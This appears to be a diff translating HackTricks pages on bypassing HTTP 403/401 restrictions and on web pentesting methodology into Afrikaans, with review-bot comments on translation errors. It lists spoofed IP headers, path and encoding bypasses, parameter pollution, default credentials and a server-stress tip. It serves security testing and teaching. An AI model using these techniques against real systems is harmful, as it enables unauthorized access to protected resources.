-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
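Review bot: In hunk `@@ -192,28 +152,26 @@` the `+` lines drop the four-space indentation from the body of `calculate_sip_md5_response` (`+ha1_input = f"{username}:{realm}:{password}"`, `+ha2 = hashlib.md5(ha2_input.encode()).hexdigest()`, `+return response` all at column 0 directly under the `def` line), so the translated snippet no longer parses; Python raises an IndentationError on the first body line. Code fences should be copied byte-for-byte by the translation workflow; restore the original indentation so the block stays runnable. The same hunk also carries the source typo "Authorizarion" into the Afrikaans text (`+So word die **Authorizarion respons** bereken:`); since the line is being rewritten anyway, correct it to "Authorization".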
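Review bot: Hunks `@@ -229,9 +187,7 @@` and `@@ -243,27 +199,26 @@` use two different words for the same term within a few lines: `+4. **Suksesvolle registrasie** respons van die registrasiebediener:` and then `+Nadat die registrasieserver die voorsiene geloofsbriewe geverifieer het`. Pick one ("registrasiebediener" matches "webbediener" used elsewhere in this patch) and apply it consistently. These hunks also remove the blank line the English source kept between a prose line and the following fence and between the fence and the next paragraph; keeping those separators makes the diff translation-only and avoids the list item and the ```yaml block being rendered as one unit.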
diff --git a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md index eed0e4e88..b577fc3a3 100644 --- a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md +++ b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md @@ -1,119 +1,118 @@ -# 403 & 401 Bypasses +# 403 & 401 Deurpasse
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## HTTP Verbs/Methods Fuzzing +## HTTP Verbs/Metodes Fuzzing -Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK` +Probeer om **verskillende metodes** te gebruik om by die lêer te kom: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK` -* Check the response headers, maybe some information can be given. For example, a **200 response** to **HEAD** with `Content-Length: 55` means that the **HEAD verb can access the info**. But you still need to find a way to exfiltrate that info. -* Using a HTTP header like `X-HTTP-Method-Override: PUT` can overwrite the verb used. -* Use **`TRACE`** verb and if you are very lucky maybe in the response you can see also the **headers added by intermediate proxies** that might be useful. +* Kyk na die reaksiehoofers, dalk kan daar inligting gegee word. Byvoorbeeld, 'n **200-reaksie** op **HEAD** met `Content-Length: 55` beteken dat die **HEAD-metode toegang tot die inligting kan kry**. Maar jy moet steeds 'n manier vind om daardie inligting uit te voer. 
+* Deur 'n HTTP-hoofer soos `X-HTTP-Method-Override: PUT` te gebruik, kan die gebruikte metode oorskryf word. +* Gebruik die **`TRACE`-metode** en as jy baie gelukkig is, kan jy dalk ook die **hoofers sien wat deur tussenliggende proksi's bygevoeg is** wat nuttig kan wees. -## HTTP Headers Fuzzing +## HTTP Hoofers Fuzzing -* **Change Host header** to some arbitrary value ([that worked here](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31)) -* Try to [**use other User Agents**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) to access the resource. -* **Fuzz HTTP Headers**: Try using HTTP Proxy **Headers**, HTTP Authentication Basic and NTLM brute-force (with a few combinations only) and other techniques. To do all of this I have created the tool [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass). +* **Verander die Host-hoofer** na 'n willekeurige waarde ([wat hier gewerk het](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31)) +* Probeer om [**ander Gebruikersagent**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) te gebruik om toegang tot die bron te verkry. +* **Fuzz HTTP Hoofers**: Probeer om HTTP Proxy **Hoofers**, HTTP-verifikasie van Basiese en NTLM-brute force (met 'n paar kombinasies slegs) en ander tegnieke te gebruik. Om dit alles te doen, het ek die gereedskap [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) geskep. 
- * `X-Originating-IP: 127.0.0.1` - * `X-Forwarded-For: 127.0.0.1` - * `X-Forwarded: 127.0.0.1` - * `Forwarded-For: 127.0.0.1` - * `X-Remote-IP: 127.0.0.1` - * `X-Remote-Addr: 127.0.0.1` - * `X-ProxyUser-Ip: 127.0.0.1` - * `X-Original-URL: 127.0.0.1` - * `Client-IP: 127.0.0.1` - * `True-Client-IP: 127.0.0.1` - * `Cluster-Client-IP: 127.0.0.1` - * `X-ProxyUser-Ip: 127.0.0.1` - * `Host: localhost` +* `X-Originating-IP: 127.0.0.1` +* `X-Forwarded-For: 127.0.0.1` +* `X-Forwarded: 127.0.0.1` +* `Forwarded-For: 127.0.0.1` +* `X-Remote-IP: 127.0.0.1` +* `X-Remote-Addr: 127.0.0.1` +* `X-ProxyUser-Ip: 127.0.0.1` +* `X-Original-URL: 127.0.0.1` +* `Client-IP: 127.0.0.1` +* `True-Client-IP: 127.0.0.1` +* `Cluster-Client-IP: 127.0.0.1` +* `X-ProxyUser-Ip: 127.0.0.1` +* `Host: localhost` - If the **path is protected** you can try to bypass the path protection using these other headers: +As die **pad beskerm is**, kan jy probeer om die padbeskerming te omseil deur hierdie ander hoofers te gebruik: - * `X-Original-URL: /admin/console` - * `X-Rewrite-URL: /admin/console` -* If the page is **behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **or** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.** -* Fuzz [**special HTTP headers**](special-http-headers.md) looking for different response. - * **Fuzz special HTTP headers** while fuzzing **HTTP Methods**. -* **Remove the Host header** and maybe you will be able to bypass the protection. +* `X-Original-URL: /admin/console` +* `X-Rewrite-URL: /admin/console` +* As die bladsy **agter 'n proksi** is, is dit dalk die proksi wat jou verhoed om toegang tot die privaat inligting te verkry. 
Probeer om [**HTTP-aanvraagsmokkelary**](../../pentesting-web/http-request-smuggling/) **of** [**hop-by-hop hoofers**](../../pentesting-web/abusing-hop-by-hop-headers.md)** te misbruik.** +* Fuzz [**spesiale HTTP-hoofers**](special-http-headers.md) op soek na 'n verskillende reaksie. +* **Fuzz spesiale HTTP-hoofers** terwyl jy **HTTP-metodes** fuzz. +* **Verwyder die Host-hoofer** en dalk sal jy die beskerming kan omseil. -## Path **Fuzzing** +## Pad Fuzzing -If _/path_ is blocked: - -* Try using _**/**_**%2e/path \_(if the access is blocked by a proxy, this could bypass the protection). Try also**\_\*\* /%252e\*\*/path (double URL encode) -* Try **Unicode bypass**: _/**%ef%bc%8f**path_ (The URL encoded chars are like "/") so when encoded back it will be _//path_ and maybe you will have already bypassed the _/path_ name check -* **Other path bypasses**: - * site.com/secret –> HTTP 403 Forbidden - * site.com/SECRET –> HTTP 200 OK - * site.com/secret/ –> HTTP 200 OK - * site.com/secret/. –> HTTP 200 OK - * site.com//secret// –> HTTP 200 OK - * site.com/./secret/.. –> HTTP 200 OK - * site.com/;/secret –> HTTP 200 OK - * site.com/.;/secret –> HTTP 200 OK - * site.com//;//secret –> HTTP 200 OK - * site.com/secret.json –> HTTP 200 OK (ruby) - * Use all [**this list**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt) in the following situations: - * /FUZZsecret - * /FUZZ/secret - * /secretFUZZ -* **Other API bypasses:** - * /v3/users\_data/1234 --> 403 Forbidden - * /v1/users\_data/1234 --> 200 OK - * {“id”:111} --> 401 Unauthriozied - * {“id”:\[111]} --> 200 OK - * {“id”:111} --> 401 Unauthriozied - * {“id”:{“id”:111\}} --> 200 OK - * {"user\_id":"\","user\_id":"\"} (JSON Parameter Pollution) - * user\_id=ATTACKER\_ID\&user\_id=VICTIM\_ID (Parameter Pollution) +As _/path_ geblokkeer is: +* Probeer om _**/**_**%2e/path \_(as die toegang deur 'n proksi geblokkeer word, kan dit die beskerming omseil). 
Probeer ook**\_\*\* /%252e\*\*/path (dubbele URL-kodering) +* Probeer **Unicode-omseiling**: _/**%ef%bc%8f**path_ (Die URL-gekodeerde karakters is soos "/") sodat dit, wanneer dit terug gekodeer word, _//path_ sal wees en dalk het jy reeds die _/path_-naamkontrole omseil +* **Ander padomseilings**: +* site.com/secret –> HTTP 403 Verbode +* site.com/SECRET –> HTTP 200 OK +* site.com/secret/ –> HTTP 200 OK +* site.com/secret/. –> HTTP 200 OK +* site.com//secret// –> HTTP 200 OK +* site.com/./secret/.. –> HTTP 200 OK +* site.com/;/secret –> HTTP 200 OK +* site.com/.;/secret –> HTTP 200 OK +* site.com//;//secret –> HTTP 200 OK +* site.com/secret.json –> HTTP 200 OK (ruby) +* Gebruik die hele [**lys**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt) in die volgende situasies: +* /FUZZsecret +* /FUZZ/secret +* /secretFUZZ +* **Ander API-omseilings:** +* /v3/users\_data/1234 --> 403 Verbode +* /v1/users\_data/1234 --> 200 OK +* {“id”:111} --> 401 Ongeoutoriseer +* {“id”:\[111]} --> 200 OK +* {“id”:111} --> 401 Ongeoutoriseer +* {“id”:{“id”:111\}} --> 200 OK +* {"user\_id":"\","user\_id":"\"} (JSON-parameterverontreiniging) +* user\_id=ATTACKER\_ID\&user\_id=VICTIM\_ID (Parameterverontreiniging) ## **Parameter Manipulation** -* Change **param value**: From **`id=123` --> `id=124`** -* Add additional parameters to the URL: `?`**`id=124` —-> `id=124&isAdmin=true`** -* Remove the parameters -* Re-order parameters -* Use special characters. -* Perform boundary testing in the parameters — provide values like _-234_ or _0_ or _99999999_ (just some example values). +* Verander **param-waarde**: Van **`id=123` --> `id=124`** +* Voeg ekstra parameters by die URL: `?`**`id=124` —-> `id=124&isAdmin=true`** +* Verwyder die parameters +* Herskik parameters +* Gebruik spesiale karakters. +* Voer grenstoetsing uit in die parameters - verskaf waardes soos _-234_ of _0_ of _99999999_ (net 'n paar voorbeeldwaardes). 
-## **Protocol version** +## **Protokolverandering** -If using HTTP/1.1 **try to use 1.0** or even test if it **supports 2.0**. +As jy HTTP/1.1 gebruik, **probeer om 1.0 te gebruik** of selfs toets of dit **2.0 ondersteun**. -## **Other Bypasses** +## **Ander omseilings** -* Get the **IP** or **CNAME** of the domain and try **contacting it directly**. -* Try to **stress the server** sending common GET requests ([It worked for this guy wit Facebook](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)). -* **Change the protocol**: from http to https, or for https to http -* Go to [**https://archive.org/web/**](https://archive.org/web/) and check if in the past that file was **worldwide accessible**. +* Kry die **IP** of **CNAME** van die domein en probeer om direk daarmee **kontak te maak**. +* Probeer om die bediener te **stres** deur algemene GET-versoeke te stuur ([Dit het vir hierdie ou met Facebook gewerk](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)). +* **Verander die protokol**: van http na https, of van https na http +* Gaan na [**https://archive.org/web/**](https://archive.org/web/) en kyk of daardie lêer in die verlede **wêreldwyd toeganklik** was. ## **Brute Force** -* **Guess the password**: Test the following common credentials. Do you know something about the victim? Or the CTF challenge name? -* [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** Try basic, digest and NTLM auth. +* **Raai die wagwoord**: Toets die volgende algemene geloofsbriewe. Weet jy iets van die slagoffer? Of die CTF-uitdaging se naam? +* [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** Probeer basiese, digest en NTLM-outentifikasie. -{% code title="Common creds" %} +{% code title="Gewone geloofsbriewe" %} ``` admin admin admin password 
@@ -126,30 +125,30 @@ guest guest ``` {% endcode %} -## Automatic Tools +## Outomatiese Gereedskap * [https://github.com/lobuhi/byp4xx](https://github.com/lobuhi/byp4xx) * [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403) * [https://github.com/gotr00t0day/forbiddenpass](https://github.com/gotr00t0day/forbiddenpass) -* [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122) +* [Burp-uitbreiding - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122) * [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
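Review bot: In hunk `@@ -1,119 +1,118 @@` the heading `-## **Protocol version**` is translated as `+## **Protokolverandering**` ("protocol change"), which changes the meaning and collides with the `+* **Verander die protokol**: van http na https` bullet in the next section; the section is about HTTP/1.0 vs 1.1 vs 2.0, so "Protokolweergawe" is the correct rendering. The same hunk flattens the nested lists: the indented `-  * \`X-Originating-IP: 127.0.0.1\`` payload lines under the "Fuzz HTTP Headers" bullet, the `site.com/secret –> HTTP 403` examples under "Other path bypasses", and the `/FUZZsecret` sub-list all become top-level `+* ` items, so the reader can no longer see which parent item they belong to; keep the two-space indentation. Terminology is also inconsistent within the file: the title uses `+# 403 & 401 Deurpasse` while the body uses "omseilings" for "bypasses", `+HTTP 403 Verbode` translates the HTTP reason phrase while `200 OK` is left as protocol text on the adjacent lines, and `skulpe te kraak` renders "pop shells" as seashells; treat "shells" and status-line reason phrases as untranslated technical terms.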
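Review bot: In hunk `@@ -126,30 +125,30 @@` the footer wording differs from the same footer translated at the top of this file and from the next file: `+* **Deel jou haktruuks ... github-opslag.` here versus `hack-truuks ... GitHub-opslagplekke` in the header of this page and `github-repos` in the README that follows. This block is shared boilerplate on every page, so it should be translated once and reused verbatim; otherwise every page diverges and later updates to the template cannot be applied mechanically.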
diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index 94165c282..c7b731982 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -1,31 +1,30 @@ -# 80,443 - Pentesting Web Methodology +# 80,443 - Pentesting Web Metodologie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## Basic Info +## Basiese Inligting -The web service is the most **common and extensive service** and a lot of **different types of vulnerabilities** exists. - -**Default port:** 80 (HTTP), 443(HTTPS) +Die webdiens is die mees **gewone en omvattende diens** en daar bestaan baie **verskillende tipes kwesbaarhede**. +**Verstekpoort:** 80 (HTTP), 443 (HTTPS) ```bash PORT STATE SERVICE 80/tcp open http 
@@ -36,57 +35,54 @@ PORT STATE SERVICE nc -v domain.com 80 # GET / HTTP/1.0 openssl s_client -connect domain.com:443 # GET / HTTP/1.0 ``` - -### Web API Guidance +### Web API Leiding {% content-ref url="web-api-pentesting.md" %} [web-api-pentesting.md](web-api-pentesting.md) {% endcontent-ref %} -## Methodology summary +## Metodologie opsomming -> In this methodology we are going to suppose that you are going to a attack a domain (or subdomain) and only that. So, you should apply this methodology to each discovered domain, subdomain or IP with undetermined web server inside the scope. +> In hierdie metodologie gaan ons aanneem dat jy 'n domein (of subdomein) gaan aanval en slegs dit. Pas hierdie metodologie toe op elke ontdekte domein, subdomein of IP met 'n onbepaalde webbediener binne die omvang. -* [ ] Start by **identifying** the **technologies** used by the web server. Look for **tricks** to keep in mind during the rest of the test if you can successfully identify the tech. - * [ ] Any **known vulnerability** of the version of the technology? - * [ ] Using any **well known tech**? Any **useful trick** to extract more information? - * [ ] Any **specialised scanner** to run (like wpscan)? -* [ ] Launch **general purposes scanners**. You never know if they are going to find something or if the are going to find some interesting information. -* [ ] Start with the **initial checks**: **robots**, **sitemap**, **404** error and **SSL/TLS scan** (if HTTPS). -* [ ] Start **spidering** the web page: It's time to **find** all the possible **files, folders** and **parameters being used.** Also, check for **special findings**. - * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._ -* [ ] **Directory Brute-Forcing**: Try to brute force all the discovered folders searching for new **files** and **directories**. 
- * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._ -* [ ] **Backups checking**: Test if you can find **backups** of **discovered files** appending common backup extensions. -* [ ] **Brute-Force parameters**: Try to **find hidden parameters**. -* [ ] Once you have **identified** all the possible **endpoints** accepting **user input**, check for all kind of **vulnerabilities** related to it. - * [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology/) +* [ ] Begin deur die **tegnologieë** wat deur die webbediener gebruik word, te **identifiseer**. Soek na **truuks** om in gedagte te hou gedurende die res van die toets as jy die tegnologie suksesvol kan identifiseer. +* [ ] Enige **bekende kwesbaarheid** van die weergawe van die tegnologie? +* [ ] Gebruik enige **bekende tegnologie**? Enige **nuttige truuk** om meer inligting te onttrek? +* [ ] Enige **gespesialiseerde skander** om uit te voer (soos wpscan)? +* [ ] Begin met die uitvoer van **algemene doeleindes skander**. Jy weet nooit of hulle iets gaan vind of as hulle interessante inligting gaan vind nie. +* [ ] Begin met die **aanvanklike kontroles**: **robots**, **sitemap**, **404**-fout en **SSL/TLS-skandering** (as HTTPS). +* [ ] Begin met die **spinnekop** van die webblad: Dit is tyd om al die moontlike **lêers, vouers** en **parameters wat gebruik word**, te **vind**. Kyk ook vir **spesiale bevindinge**. +* [ ] _Let daarop dat enige tyd 'n nuwe gids ontdek word tydens brute-forcing of spinnekop, dit moet gespinnekop word._ +* [ ] **Gids Brute-Forcing**: Probeer om alle ontdekte vouers te brute force op soek na nuwe **lêers** en **vouers**. +* [ ] _Let daarop dat enige tyd 'n nuwe gids ontdek word tydens brute-forcing of spinnekop, dit moet brute force word._ +* [ ] **Backups kontroleer**: Toets of jy **backups** van **ontdekte lêers** kan vind deur algemene backup-uitbreidings by te voeg. 
+* [ ] **Brute-Force parameters**: Probeer om **verskuilde parameters** te vind. +* [ ] Nadat jy al die moontlike **eindpunte** wat **gebruikersinsette** aanvaar, geïdentifiseer het, kyk vir alle soorte **kwesbaarhede** wat daarmee verband hou. +* [ ] [Volg hierdie kontrolelys](../../pentesting-web/web-vulnerabilities-methodology/) -## Server Version (Vulnerable?) +## Bedienerweergawe (Kwesbaar?) -### Identify - -Check if there are **known vulnerabilities** for the server **version** that is running.\ -The **HTTP headers and cookies of the response** could be very useful to **identify** the **technologies** and/or **version** being used. **Nmap scan** can identify the server version, but it could also be useful the tools [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)or [**https://builtwith.com/**](https://builtwith.com)**:** +### Identifiseer +Kyk of daar **bekende kwesbaarhede** is vir die bediener **weergawe** wat gebruik word.\ +Die **HTTP-koppe en koekies van die respons** kan baie nuttig wees om die **tegnologieë** en/of **weergawe** wat gebruik word, te **identifiseer**. **Nmap-skan** kan die bedienerweergawe identifiseer, maar die hulpmiddels [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)of [**https://builtwith.com/**](https://builtwith.com)**:** kan ook nuttig wees. 
```bash whatweb -a 1 #Stealthy whatweb -a 3 #Aggresive webtech -u webanalyze -host https://google.com -crawl 2 ``` +Soek na kwesbaarhede van die webtoepassing weergawe -Search **for** [**vulnerabilities of the web application** **version**](../../generic-methodologies-and-resources/search-exploits.md) - -### **Check if any WAF** +### Kontroleer of enige WAF * [**https://github.com/EnableSecurity/wafw00f**](https://github.com/EnableSecurity/wafw00f) * [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git) * [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html) -### Web tech tricks +### Web tegnologie truuks -Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used: +Sommige truuks om kwesbaarhede in verskillende bekende tegnologieë op te spoor: * [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md) * [**Apache**](apache.md) @@ -98,8 +94,8 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Git**](git.md) * [**Golang**](golang.md) * [**GraphQL**](graphql.md) -* [**H2 - Java SQL database**](h2-java-sql-database.md) -* [**IIS tricks**](iis-internet-information-services.md) +* [**H2 - Java SQL-databasis**](h2-java-sql-database.md) +* [**IIS truuks**](iis-internet-information-services.md) * [**JBOSS**](jboss.md) * [**Jenkins**](broken-reference/) * [**Jira**](jira.md) @@ -108,7 +104,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Laravel**](laravel.md) * [**Moodle**](moodle.md) * [**Nginx**](nginx.md) -* [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/) +* [**PHP (php het baie interessante truuks wat uitgebuit kan word)**](php-tricks-esp/) * [**Python**](python.md) * [**Spring Actuators**](spring-actuators.md) * [**Symphony**](symphony.md) 
